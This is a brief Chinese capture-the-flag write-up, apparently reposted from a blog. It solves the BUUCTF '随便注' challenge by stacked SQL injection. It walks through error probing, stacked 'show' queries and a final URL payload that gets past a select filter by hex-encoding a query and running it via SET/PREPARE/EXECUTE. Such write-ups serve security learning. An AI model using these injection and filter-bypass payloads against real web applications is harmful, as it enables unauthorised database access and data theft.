堆叠注入——BUUCTF-随便注
作者:互联网
由题目提示知道,这题需要进行sql注入
输入1'发现报错
再输入1';show batabases#出现了一大堆数据库
再输入1';show tables#出现了两个表
猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现
因为select被过滤了,所以先将select * from `1919810931114514`进行16进制编码
再通过构造payload,得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn?inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
标签:随便,BUUCTF,show,堆叠,flag,输入,execsql,1919810931114514,select 来源: https://www.cnblogs.com/MisakaYuii-Z/p/11480393.html